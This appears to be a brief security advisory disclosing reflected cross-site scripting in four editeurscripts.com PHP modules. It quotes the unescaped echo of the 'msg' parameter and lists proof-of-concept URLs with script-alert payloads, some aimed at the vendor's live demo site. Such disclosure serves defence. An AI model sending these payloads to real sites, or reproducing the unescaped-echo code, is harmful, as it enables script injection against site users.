#
# Multiple modules XSS vulnerability with the authors editeurscripts.com
# Modules Vulnerable:
#			-EScontacts 	v1.0
#			-EsBaseAdmin 	v2.1
#                       -EsPartenaires	v1.0			
#			-EsNews		v1.2
#			
#
# Author: Jonathan Salwan
# Mail  : submit [AT] shell-storm.org
# Web   : http://www.shell-storm.org
#
# For the 4 modules, the codes were identical.
#
#		 
#		 [...]
#		 if ($_GET["msg"] != "")
#		 {
#		 $msg = str_replace("+"," ",$_GET["msg"]);
#		 $msg = stripslashes($msg);
#		 echo("<div align=\"center\" class=\"alert\">$msg</div><br />");
#		 }
#		 [...]		 
#		 
#
# Use Vulnerability:
# ------------------
#
# EsContacts v1.0 	=> http://localhost/EsContacts/login.php?msg=<script>alert('xss');</script> 
# 
# EsBaseAdmin v2.1 	=> http://localhost/EsBaseAdmin/default/login.php?msg=%3Cscript%3Ealert(%27a%27);%3C/script%3E
# Live Demo 		=> http://demo.editeurscripts.com/EsBaseAdmin/default/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E
#
# EsPartenaires v1.0	=> http://localhost/EsPartenaires/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E
# Live Demo		=> http://demo.editeurscripts.com/EsPartenaires/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E
#
#
# EsNews v1.2 		=> http://localhost/EsNews/admin/news/modifier.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E
#			(not need to be administrator)
#
#